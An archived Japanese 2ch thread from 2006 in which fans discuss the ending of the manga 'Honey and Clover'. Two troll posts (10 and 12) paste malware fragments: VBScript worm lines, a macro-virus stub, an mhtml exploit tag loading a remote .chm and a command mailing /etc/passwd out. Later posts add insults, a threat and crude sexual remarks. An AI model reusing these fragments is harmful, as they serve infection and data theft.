5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その45

1 :花と名無しさん:2006/07/11(火) 02:30:50 ID:???0

◆ コミックス第9巻・・・・・・・・・7月14日(金)発売決定.◆
◆ アニメ第2部・・・・・・・・・・・・6月29日(木)〜放送中 ◆
◆ 映画・・・・・・・・・・・・・・・・・7月22日(土)上映開始 ◆

      ※アニメ,映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※


★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※

★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※


≪前スレ≫
羽海野チカ「ハチミツとクローバー」その44
http://comic6.2ch.net/test/read.cgi/gcomic/1151942763


関連スレ,頻出質問事項等は>>2-3あたりに


2 :花と名無しさん:2006/07/11(火) 02:31:33 ID:cg8SscAj0
>>1


3 :花と名無しさん:2006/07/11(火) 02:31:53 ID:???0

≪関連スレ≫
ハチミツとクローバーアンチスレ
http://comic6.2ch.net/test/read.cgi/csaloon/1146626902 (漫画サロン板に移転)
ハチミツとクローバー II chapter.1 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1151415452 (アニメ板)
【櫻井翔】ハチミツとクローバー2冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1149597898 (映画作品・映画人板) 

≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。   ※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]


4 :花と名無しさん:2006/07/11(火) 02:32:27 ID:???0
ageちゃったよ
スマソ


5 :花と名無しさん:2006/07/11(火) 02:33:20 ID:???0
乙保守


必要ないかw

6 :花と名無しさん:2006/07/11(火) 02:34:16 ID:???0
>>2>>4

♪そんなにソワソワしないで

7 :花と名無しさん:2006/07/11(火) 02:35:57 ID:???O
   ∧((∧
  ミ# ゚Д゚) <イケメンに替わって7ゲットたいたい
  ( 14 )
   |   |
   し ⌒J


8 :花と名無しさん:2006/07/11(火) 02:46:21 ID:???0
>>3
乙ですよ?
よくまとまっていますね☆

9 :花と名無しさん:2006/07/11(火) 02:56:06 ID:???0
>>8
ウミノタンキターw

10 :<body onload=window()>:2006/07/11(火) 04:09:39 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

11 :花と名無しさん:2006/07/11(火) 04:43:05 ID:FiwgtqvN0
専ブラで>>10にノートン先生が反応していちいちスレ再取得だよ(´Д`)

12 :花と名無しさん:2006/07/11(火) 04:52:32 ID:???0
             kak.hta';ken=wdt'START
イッパイ         ms-its:mhtml:file://c:\
 モッテキタヨ-      cat /etc/passwd | mail nobody@nonexistent.com
      ∧__∧   c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
     ( ´・ω・)   Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
     /ヽ○==○ fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
    /  ||_ If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
    し' ̄(_)) ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_)) ̄ ̄(_))

13 :花と名無しさん:2006/07/11(火) 04:57:07 ID:FiwgtqvN0
うわーん。゚(゚´Д`゚)゚。

14 :花と名無しさん:2006/07/11(火) 05:05:40 ID:8sQrBHcOO
たけのこが氏んで幽霊(=ほんとの空気)になり、
皆の数年後を解説&モノローグ。
臭とカバのこどもだけが(カバそっくりだけど黒髪)エアたけのこ発見☆ニッコリ☆
続編を作者だけが望みながらEND…

15 :花と名無しさん:2006/07/11(火) 07:26:57 ID:???0
ノートン入れたら2chに書きこめない人へ *
http://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08

16 :花と名無しさん:2006/07/11(火) 15:47:34 ID:???0
>>14
たけのこは不幸すぎて前から死亡説出てるけど、死んでもみんな
そんなに悲しまないから死ぬはずがない。それもまた不幸な話だが。

・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。



こうして不幸羅列するとほんとに悲惨すぎる。ていうかタフすぎる。
はぐと山田の拷問料理とか細かい不幸まだあるし。

でもこんなたけのこが大好きです。ハチクロで間違いなく一番好きだ。
もう他の話いいから、たけのこの不幸話をもっとやってくれよ!

17 :花と名無しさん:2006/07/11(火) 16:07:57 ID:???0
痔になるカワイス(*´・ω・)(・ω・`*)ネー

18 :花と名無しさん:2006/07/11(火) 16:10:21 ID:???0
探さない方がいいのに}(´・ω・`)

19 :花と名無しさん:2006/07/11(火) 16:14:03 ID:???0
むしろ絶頂期。( ´,_ゝ`)プッ

20 :花と名無しさん:2006/07/11(火) 16:15:51 ID:???0
拷問料理





(゚Д゚;≡;゚д゚)

21 :花と名無しさん:2006/07/11(火) 16:23:03 ID:???0
>>16
こうやって羅列されたのを
改めて読んでみると、たけのこテラカワイソス(つ;Д`)

22 :花と名無しさん:2006/07/11(火) 16:24:53 ID:???O
しょうがないよ、だって竹本君だもん。

23 :花と名無しさん:2006/07/11(火) 16:32:13 ID:???0
そういう運命なんだね

24 :花と名無しさん:2006/07/11(火) 16:48:30 ID:???0

「がんばってもがんばっても、最後に報われるとは限らない」

そんなビターな現実を、我々に諭してくれてるんですよ
この作品における、竹本というキャラの存在を通して・・・


                                 ンナワキャ('A`)ナイ

25 :花と名無しさん:2006/07/11(火) 16:49:36 ID:???0
んなもん諭してくれんでいいorz

26 :花と名無しさん:2006/07/11(火) 17:08:33 ID:???0
もし夢オチがきても竹本の夢設定だけはやめてくれ
悪夢過ぎる

27 :花と名無しさん:2006/07/11(火) 17:14:13 ID:???0
とにかく主人公に返り咲いてくれさえすれば

28 :花と名無しさん:2006/07/11(火) 17:24:48 ID:???0
たけのこが一番好きだっただけにこの仕打ちは辛いぜ

29 :花と名無しさん:2006/07/11(火) 18:48:20 ID:???0
一番好きなキャラは森田で
一番幸せになって欲しかったキャラは竹本な私には今の展開は認めがたい

30 :花と名無しさん:2006/07/11(火) 19:17:44 ID:???0
モブ本の不幸は相当なもんだよな。
でもギャグっぽくされてかわいそう。

31 :花と名無しさん:2006/07/11(火) 21:51:09 ID:???0
>・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。

これってなんだっけ?

32 :花と名無しさん:2006/07/11(火) 21:53:58 ID:???0
>>16これなんて人生ゲーム?


33 :花と名無しさん:2006/07/11(火) 21:58:27 ID:???0
今更コーラス読んだけど、
修8巻と顔違いすぎ。笑
はぐも背が伸びてるね。

真山と山田って、
はぐ→森田の気持ちは気付いてたけど
森田→はぐも知ってたっけ?
友人2人の恋の破滅を笑顔で祝う真山…?

34 :花と名無しさん:2006/07/11(火) 22:00:32 ID:???0
>>31
ロリコンのモンゴル出張中に、
同居人の山田さんが家の手伝いで実家帰っちゃって、
はぐが東京で初めての一人ぼっちだから俺が!    みたいな話。

35 :花と名無しさん:2006/07/11(火) 23:18:42 ID:???0
この作者って“ロン毛気味の男がうしろで髪くくってる”ってモチーフ好きだね
森田といい野宮といい。


36 :花と名無しさん:2006/07/11(火) 23:21:30 ID:???0
はぐ 竹本 真山 森田 山田 修の6人の中で
はぐと真山だけ関係が薄いというか、二人きりのやりとりとか一切ないな。

真山ははぐの事を「あの難しい子」って言ってて距離を感じる。
はぐは年上好き変態ストーカー冷血人間の真山から全く興味を持たれなかったんだろうな。
なんか仲間内にいつの間にかコロボックルいるけど仲いいフリしとくか的なノリで。


>>16
クリスマスに「なんで ここにいるのは ぼくなんだろう」
って自問する竹本が切な過ぎる。

37 :花と名無しさん:2006/07/11(火) 23:29:03 ID:???0
一話のはぐと真山・竹本の初対面のシーンでは
真山がなれなれしく握手しようとして
修に釘さされてるよね。
あれは女の子としてみてたってこと?
まだ真山が女好き設定だったから?
それとも普通に社交辞令?


38 :花と名無しさん:2006/07/11(火) 23:33:02 ID:???0
>「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」

先生は竹本がはぐスキってとっくに知ってるよね。
こうやってダメージ食らわしてライバルを減らす作戦か!

39 :花と名無しさん:2006/07/11(火) 23:54:09 ID:???0
>>37
竹本が惚れたのを見て興味が無くなったんだと思う。

40 :花と名無しさん:2006/07/11(火) 23:59:21 ID:???0
ヒポポタマス

41 :花と名無しさん:2006/07/12(水) 00:04:41 ID:???0
花本=花
竹本=竹
山田=山
真山=山
森田=森
野宮=野
原田=原

花=花 山=山 森=竹 野=原

こういうカップルになるね

42 :花と名無しさん:2006/07/12(水) 00:18:42 ID:???0


43 :花と名無しさん:2006/07/12(水) 00:33:49 ID:???0


44 :花と名無しさん:2006/07/12(水) 00:37:08 ID:???0
名前に既にカップリングが潜んでるってどうして気付かないかな?

45 :花と名無しさん:2006/07/12(水) 00:58:42 ID:???0
>>41
すごく暇な人なんですね。

46 :花と名無しさん:2006/07/12(水) 01:01:23 ID:???0
ワケワカメ

47 :花と名無しさん:2006/07/12(水) 01:01:54 ID:???0
>>45
暇で悪いのかよあぁ?
あんたに迷惑かけたか?
ざけんなよ

48 :花と名無しさん:2006/07/12(水) 01:05:12 ID:???0
>>47
頭の悪い書き込み読まされただけで、
十分迷惑だなあ。

49 :花と名無しさん:2006/07/12(水) 01:06:07 ID:???0
>>48
呪い殺すぞ

50 :花と名無しさん:2006/07/12(水) 01:06:39 ID:???0
>>47
メンヘルニートでつか?
サイトではリスカ自慢と薬自慢?www


51 :花と名無しさん:2006/07/12(水) 01:07:49 ID:???0
今日何気なく久しぶりにコーラス立ち読みしたら、とんでもない展開になってて、
前スレ全部読んでなんとか事情を理解しました。
 
つーか、なんでいきなり修があんなキモいキャラになってるんだ…
ハチクロではtkmtの次に好きなキャラだったんだよ俺orz

52 :花と名無しさん:2006/07/12(水) 01:10:20 ID:???0
>>50
薬なめんなよ

53 :花と名無しさん:2006/07/12(水) 01:16:00 ID:???0
もう飽和状態なんだな何もかも

54 :花と名無しさん:2006/07/12(水) 01:17:16 ID:???0
>>53
バカが見透かしたようなこというなバカ

55 :花と名無しさん:2006/07/12(水) 01:26:52 ID:???0


★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

56 :花と名無しさん:2006/07/12(水) 01:37:26 ID:???0
はぐはがばがばまんこ
山田は数の子天井

57 :花と名無しさん:2006/07/12(水) 02:12:14 ID:???0
ホントに腐女子がファビョってるwwwwwwwwwwwwwwww

58 :花と名無しさん:2006/07/12(水) 02:14:27 ID:???0
>>56
カバだけに? >がばがば
つか山田さんネ申すぎるw野宮には死んでもらいたい

59 :花と名無しさん:2006/07/12(水) 02:16:07 ID:???0
山田は毎日真山でオナってるのに、真山がリカさんのナプキンでシコってるとは何事か(`・ω・´)

60 :花と名無しさん:2006/07/12(水) 02:18:23 ID:???0
>>58
しまりよさそうな体型してないしね
寝てる間に修がバイブ突っ込んでるし
はぐは不感症だからわかってないだけ

61 :花と名無しさん:2006/07/12(水) 02:18:25 ID:???0
野宮と真山はユニコーンの角に刺されてくるべき

62 :花と名無しさん:2006/07/12(水) 08:55:57 ID:???0
明日には早売りコミックス手に入るかな
表紙を見るとしょっぱい気持ちでいっぱいになりそうなので
今回はカバーかけてもらうか・・・

9巻発売後のこのスレの反応が良くも悪くも楽しみだ       チラ裏失礼

63 :花と名無しさん:2006/07/12(水) 09:08:22 ID:???O
>>55
   ∧((∧
  ミ# ゚Д゚) <呼んだか?
  ( 14 )
   |   |
   し ⌒J


64 :花と名無しさん:2006/07/12(水) 09:09:36 ID:???O
>>54
   ∧((∧
  ミ# ゚Д゚) <こっちだった
  ( 14 )
   |   |
   し ⌒J


65 :花と名無しさん:2006/07/12(水) 10:07:57 ID:???0
修を救済しようとしたら、はぐしか相手がいなくて森田と竹本を捨てざるを得なかった。
ダサい。
保険として大学内に適齢期逃した女性教員でも置いておけば良かったんだ。
理花を挟んで真山との三角関係を築こうとしたのも早い段階で頓挫したんだし。
修を放置し過ぎたんだ。

66 :花と名無しさん:2006/07/12(水) 10:21:13 ID:???0
別に修に恋愛要素を絡ませなくても良かったと思うんだが…

67 :花と名無しさん:2006/07/12(水) 10:34:36 ID:???0
一部に修のオチを気に掛ける声があったのと、あとはまあ…ぶっちゃけチカの思い入れでは。
金も力も無い竹本が何も出来ないってのはそこだけ妙にリアル大学生なんだけどな。
しかしそこだけリアルにしても…なあ。
はぐの天才っぷりを強調しすぎたツケとも言えるが。

68 :花と名無しさん:2006/07/12(水) 10:41:24 ID:???0
事実上、はぐは「自分の才能を優先して、誰も選ばなかった」とも言える。
修は自分の才能を保持するのに一番都合が良かっただけ。

69 :花と名無しさん:2006/07/12(水) 10:45:03 ID:2rtOKWAUO
修ははぐを選んだけど、はぐはまだ誰も選んでないよね?
勝手に森と竹が引いただけで、最終的には竹を選びそう

70 :花と名無しさん:2006/07/12(水) 10:45:32 ID:???0
え?
「わたしの だいじな だいじな ひと」
だよ?

71 :花と名無しさん:2006/07/12(水) 10:53:23 ID:???0
>>66
同意。奴は一人でしょっぱくなってればいい。
あえて修に恋愛からませるとしたら、相手は山田でもよかったじゃん。
そっちのほうが自然じゃん。恋愛相談乗ってたし。


72 :花と名無しさん:2006/07/12(水) 10:53:33 ID:???0
はぐの選択肢にたけのこは最初から最後まで入ってない

73 :花と名無しさん:2006/07/12(水) 10:55:38 ID:???0
泣けてくる・・・たけのこ・・・・・・

74 :花と名無しさん:2006/07/12(水) 10:56:49 ID:???0
超ウルトラCで数年後に逞しくなって帰ってきた竹本が…で最後のコマってのもアリかもだが。
 
しかしこの話って竹本以外主要キャラ全員何かしら変で、
変人同士でくっつくか我が道を歩むかした末に、一番まともな竹本が一人残ったみたいな感じ。
野宮は…ファンの人には申し訳ないけど敗戦処理要員に近くなっているような。
普通の漫画なら、中盤くらいで竹本×山田の避難経路くらい用意しておくと思うんだけど、
なんせこれ、「全部片思い」だからねぇ。
カップリングどころか普通の会話すらサシではろくに無かったもんな。真山とはぐも同様だけど。

75 :花と名無しさん:2006/07/12(水) 11:05:05 ID:???0
こんな感じで痛いポエムを楽しめる漫画でオススメありますか?

76 :花と名無しさん:2006/07/12(水) 11:16:29 ID:???0
森田と先生の距離感がよくわからない。
付き合い長いはずだけど、はぐ絡みのもめごとのときしか2人の会話は無い。

77 :花と名無しさん:2006/07/12(水) 11:22:17 ID:???0
>>75
この痛い感じがめずらしくて売れてるんでしょ?なかなか無いんじゃない?

78 :花と名無しさん:2006/07/12(水) 11:22:25 ID:???0
ウミノタンって美大卒じゃないんだよね?
なんでムサビをモデルにしたの?
どっかでガイシュツ?

79 :花と名無しさん:2006/07/12(水) 11:58:43 ID:???0
>>74
竹本×山田なんて両者のファンも望んでない組み合わせじゃね?
この二人って相手の趣味はともかく一途なのが売りなんだから
まかり間違ってもこの組み合わせにはたどり着かないと思う
山田が野宮に傾くためには野宮には他に女がいないってのは大きかったと思うし
はぐに一目惚れするような竹本が山田に惚れるとは思えない

山田と仲の良かった森田ですら山田の恋愛要員にはならなかったんだから
それ以上に接点薄い竹本と山田は避難経路としても妥当性を欠く気がする

80 :花と名無しさん:2006/07/12(水) 12:01:20 ID:???0
>>79
だから「全員片思い」という売り文句を出した時点で敗北は半分確定的だったんだよ。

81 :花と名無しさん:2006/07/12(水) 12:02:40 ID:???0
真山がこうなるようにしか流れてなかったって言うように
はぐがケガをしてなくても森田とは結局ダメだったってことなのかな?
創作の刺激にもなる好きな人なのになんでだろう。
はぐにとっては両思いより片思いのままで遠くから見ていたい存在なのかな。
でも病室で森田に微笑むはぐの表情はかわいかったしきちんと向き合って
話す2人はいい感じに見えたけど
『ごめんね森田さん。さよなら私の恋』ってことか。


82 :花と名無しさん:2006/07/12(水) 12:19:47 ID:???0
>>81
>創作の刺激にもなる好きな人なのになんでだろう。

大好きな森田の負担になりたくなかったんじゃない?

83 :花と名無しさん:2006/07/12(水) 12:21:53 ID:???0
ハチクロワールドではウミノさんが神だから、
「こうなるように流れてた」って言われたらそれで納得する以外に道は無いけど、
はぐがケガをしてなかったらっていう「もしも」が許されるなら森田とうまくいく可能性はあったと思う。
もともと森田は、
自分は家族がらみの問題でちゃんと傍にいられないからっていう理由で遠慮気味だったんだろうけど
問題は解消したんだし・・・

84 :花と名無しさん:2006/07/12(水) 12:25:20 ID:???0
>>80
そもそもこの漫画は竹本と森田がはぐに一目惚れするところから始まってる
だから全員片想いにするなら竹本を山田に惚れさせるより
はぐが誰かに片想いするのが自然
その相手は今までなら修あたりが妥当だったけど
今となってはそれも有り得ない

85 :花と名無しさん:2006/07/12(水) 12:29:43 ID:???0
森田側の家族の問題が解決した変わりに
はぐ側に怪我問題が発生したから結局ダメになったってことか。

でも修が大人の立場ではぐの怪我を完治するまで支えて
なんとかなりそうになったら森田にはぐ託すのが
今までの修のキャラだったのに急に色ボケしちゃったからな。
これまでのキャラだったら修が便利に使われてカワイソスって同情できたけど
色ボケた今はロリコンキモスとしか思えない。

86 :花と名無しさん:2006/07/12(水) 12:55:59 ID:???0
群像劇で片思いだけって無理があると思うんですよ。
ストレートで上手くいったのは結局隔絶されたスペースで戦っていた真山だけでしょ。
多人数になると逃げ道がないから収拾付かない。
だったら修もはぐも誰ともくっつかないでみんなバラバラで終われば良いじゃんと思うけど…
 
チカの中ではそうならなかった。
ならなかったんだよ。
だから、この話はこれで終わりなんだ。

87 :花と名無しさん:2006/07/12(水) 12:59:27 ID:???0
その前に
修が色ボケしなければ
修と、森田または竹本(…はあんまり需要無いのかもしれないけど)で
保護者サイド・恋人サイドの両方から2人ではぐサポートするのが可能だったはず。
修が父親役を放棄したせいで
選んだ相手がはぐの人生背負うみたいな展開になってるけど・・・

88 :花と名無しさん:2006/07/12(水) 13:02:38 ID:???0
ていうかさ、単純に男女比が釣り合わないよな。
修どころか野宮が参加した時点で合わない。
その結果として一番の変人と一番の貧乏人が脱落するってのは…それはそれでリアル、なのか?

89 :花と名無しさん:2006/07/12(水) 13:08:44 ID:???0
一番の変人と一番の貧乏人がくっつけばよろしいがなw

90 :花と名無しさん:2006/07/12(水) 13:11:13 ID:???0
散々言い尽くされたことだろうけど
締めに向かうに当たっての大きなヤマに
天才キャラのケガを持って来たからとこもう
唐突でわけわからんのに陳腐、ていう展開は約束されてたんだろうな。

せめてケガっていう大きな山を修に頼らずに乗り越えた上で
修がどんだけ自分のことを思ってくれてたか初めて気付く…とかなら
まだ成長物語として読めたのに。

91 :花と名無しさん:2006/07/12(水) 13:12:39 ID:???0
>>89
あの訳分からない巨大企業が日本の神社仏閣補修に全面協力するのかw
 
「日本の全国民から正月に必ず10円〜1000円くらい集金できるシステムに興味はないか?」

92 :花と名無しさん:2006/07/12(水) 13:22:57 ID:???0
はぐもギャグキャラならあんな怪我してもすぐ治るんだろうにねぇ
かわいそうに

93 :花と名無しさん:2006/07/12(水) 13:24:54 ID:???0
修ははぐのサポートをすることで自分では見えなかった世界や夢に向かうことが
できるんだからそれだけで満たされるんだと思ってた。はぐにとってだけ
都合のいい存在じゃなくて修にとってもはぐは自分を生かす宝物みたいな。
恋愛感情を持たせないと修が大学を休職したりはぐのためにすべてを投げ出したり
することに説得力が出せなかったのかな。
好きな人と一緒にはなれないせつなさを描きたかったのかもしれないけど
森田の家の事情、はぐのケガのタイミング、修の恋愛感情、どうにもならない
障害が多くて可哀想すぎる。作者が無理矢理引き離したみたい…

94 :花と名無しさん:2006/07/12(水) 13:26:18 ID:???0
山田:失恋相手を上回る新しい男GET
竹本:自分探しで一回り成長、結果はご愁傷様ながら果敢にはぐに告白
真山:めでたくストーカーの成果が実る
森田:暗い過去解消
(おまけ 理花:旦那の死を引きずりつつも若い男と新たな一歩)

ここにてっきり はぐみ:一人だち、そして初恋愛 が加わるかと思いきや!
みごとにどっちも打ち砕いてくれましたね。
はぐは成長しないのか。
永遠の幼女か。

95 :花と名無しさん:2006/07/12(水) 13:30:44 ID:???0
>>92
(*´・ω・)(・ω・`*)ネー

96 :花と名無しさん:2006/07/12(水) 13:36:17 ID:???0
修:最後の最後にいきなり参戦してごっつぁんゴール

97 :花と名無しさん:2006/07/12(水) 13:41:34 ID:???0
修:ロリコン趣味開花

98 :花と名無しさん:2006/07/12(水) 13:48:11 ID:???0
修がはぐをgetするなら野宮が山田getする以上に
その過程を描かなきゃダメだと思うんだ

99 :花と名無しさん:2006/07/12(水) 13:55:09 ID:???0
最初の頃は修とリカが原田の死を乗り越えて同士愛的な修リカ
真山はリカを原田の呪縛から解き放つも幸せの青い鳥はここにいたと真山あゆ

みたいな展開になるのかと思ってた
まぁ野宮出てくるし修は真山に任せてリカ放置だし
真山ますますストーカー技冴え渡るしで早々に諦めたけど

100 :花と名無しさん:2006/07/12(水) 13:57:32 ID:???0
こんな急展開いらないから、ほのぼのぬるいハチクロワールドに浸ってたかったよ
山田はぐの同居生活とかほとんど描写無くてもったいないよね。
描こうと思えばいくらでもかけそうなネタなのに

101 :花と名無しさん:2006/07/12(水) 13:58:23 ID:???0
>>98
     ,.ィ , - 、._     、
.     ,ィィr--  ..__、j
   ル! {       `ヽ,       ∧
  N { l `    ,、   i _|\/ ∨ ∨
  ゝヽ   _,,ィjjハ、   | \
  `ニr‐tミ-rr‐tュ<≧rヘ   > 今まで書かれていた修の独り言やら
     {___,リ ヽ二´ノ  }ソ ∠ 思い出話がその「過程」だったんだよ!!
    '、 `,-_-ュ  u /|   ∠
      ヽ`┴ ' //l\  |/\∧  /
--─‐ァ'| `ニ--‐'´ /  |`ー ..__   `´
    く__レ1;';';';>、  / __ |  ,=、 ___
   「 ∧ 7;';';'| ヽ/ _,|‐、|」 |L..! {L..l ))
   |  |::.V;';';';'| /.:.|トl`´.! l _,,,l | _,,|  , -,
    ! |:.:.:l;;';';';'|/.:.:.:||=|=; | |   | | .l / 〃 ))
    l |:.:.:.:l;';';'/.:.:.:.:| ! ヽ \!‐=:l/ `:lj  7
    | |:.:.:.:.l;'/.:.:.:.:.:.! ヽ:::\::  ::::|  ::l /


102 :花と名無しさん:2006/07/12(水) 14:06:45 ID:???0
ストーカーこわいよー(´・ω・`)
リカにはローマイヤ先輩と幸せを築いて欲しいなー(´・ω・`)


103 :花と名無しさん:2006/07/12(水) 14:15:52 ID:???0
ローマイヤ先輩はみんなの物ですからダメです。
ていうか理花は陽性の物を近づけると自虐に走って死にます。
ストーカーが丁度良いです。
 
でも実写版の真山は普通にサイコらしいので困ります。

104 :花と名無しさん:2006/07/12(水) 14:29:05 ID:???0
羽海野さんの息子にはうまれたくねーな
なんか親子愛と恋愛感情をごっちゃにしてる感じ

105 :花と名無しさん:2006/07/12(水) 15:26:50 ID:???O
今ラジオで、今月か来月で終わるって言ってるぞ
単行本でしか読んでないけど、丸く収まりそうか?

106 :花と名無しさん:2006/07/12(水) 15:29:54 ID:???0
前スレとか読んでみればわかりますよ

107 :花と名無しさん:2006/07/12(水) 15:34:48 ID:???0
むしろ来月までかかるのか?
あと一話で片付けるのかと思っていたけど。

108 :花と名無しさん:2006/07/12(水) 15:45:12 ID:???0
あれ、じゃあどんでん返しあるかもね。

109 :花と名無しさん:2006/07/12(水) 16:00:22 ID:???0
100年後とかになってたりして

110 :花と名無しさん:2006/07/12(水) 16:07:02 ID:???0
キャラ達は、セミに生まれ変わってるんだよきっと

111 :花と名無しさん:2006/07/12(水) 16:11:52 ID:???0
それは一体どういう展開?
メトロポリタン美術館でHagumi Takemoto展とかか?

112 :花と名無しさん:2006/07/12(水) 16:20:25 ID:???0
はぐみと修が子孫残してたりしたら 激しく orz だなぁ

113 :花と名無しさん:2006/07/12(水) 16:23:36 ID:???0
おまいら展開がアレだからって妄想が飛躍し過ぎw

114 :花と名無しさん:2006/07/12(水) 16:25:07 ID:???0
今更だけどはぐ達の三角(四角?)関係に結論出さなくても良かったなぁ
最後サザエさん形式でフェードアウトして
あぁこいつら今後もきっと幸せに暮らしてるんだろうなって思わせる終わり方で別によかったのに
カップリングはまだみんな若いんだしはぐの精神も幼い感じだから
結論ははっきり出さないで多少匂わせつつも読者にお任せしますよくらいでよかった
こんな夢も希望もない結論なんか見たくなかったよ

115 :花と名無しさん:2006/07/12(水) 16:32:03 ID:???0
>>101   

>>98じゃないけど

      _人人人人人人人人人人人人人人_
        >    な なんだってー!!    <
        ̄^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^Y^ ̄
        _,,.-‐-..,,_       _,,..--v--..,_
    /     `''.v'ν Σ´        `、_,.-'""`´""ヽ
    i'   / ̄""''--i 7   | ,.イi,i,i,、 、,、 Σ          ヽ
.     !ヘ /‐- 、u.   |'     |ノ-、 ' ` `,_` | /i'i^iヘ、 ,、、   |
    |'' !゙ i.oニ'ー'〈ュニ!     iiヽ~oj.`'<_o.7 !'.__ ' ' ``_,,....、 .|
.   ,`| u       ..ゝ!     ‖  .j     (} 'o〉 `''o'ヽ |',`i
_,,..-<:::::\   (二> /      !  _`-っ  / |  7   ̄ u |i'/
. |、 \:::::\ '' /        \ '' /〃.ヽ `''⊃  , 'v>、
 !、\  \. , ̄        γ/| ̄ 〃   \二-‐' //`



116 :花と名無しさん:2006/07/12(水) 16:33:48 ID:???0
>>114
禿げ上がるほど同意

たぶんその終わり方でも
未消化だとかここまでひっぱっといてそんなのありかよとか
色々不満は出るだろうけど
そんな不満をいえたらどんなに幸せだったか

117 :花と名無しさん:2006/07/12(水) 16:37:12 ID:???0
>>114

自分もてっきりそういうラストになるんだろうと思ってた。

嫌〜な現実味だけを感じさせるラストで突き抜けそうで、なんだかな

118 :花と名無しさん:2006/07/12(水) 16:46:40 ID:???0
こうなると、一平×あゆ もあり得そうな気がしてきた

119 :花と名無しさん:2006/07/12(水) 16:49:13 ID:???0
ところでオサレチャンプの未来は?

120 :花と名無しさん:2006/07/12(水) 17:01:15 ID:???0
オサレキング

121 :花と名無しさん:2006/07/12(水) 17:04:06 ID:???0
最終的には マスター・オサレ

122 :花と名無しさん:2006/07/12(水) 18:02:01 ID:???0
>>101>>115のような
キバヤシ&仲間の
小さいAAは初めて見た…。
コンパクトにまとまってGJ

ハチクロってAAないのかな…。

123 :花と名無しさん:2006/07/12(水) 18:18:20 ID:???0
>>121 ミスター・オクレみたいな響きだなw

>>122 アニメ版?森田は見たことあるがね。>ハチクロAA
つかジャンル的に、AA職人やフラ職人、絵師さん等が少ないんじゃないかねぇ。
このスレもネタ絵投下とか無いよね。


124 :花と名無しさん:2006/07/12(水) 18:25:21 ID:???0
>119

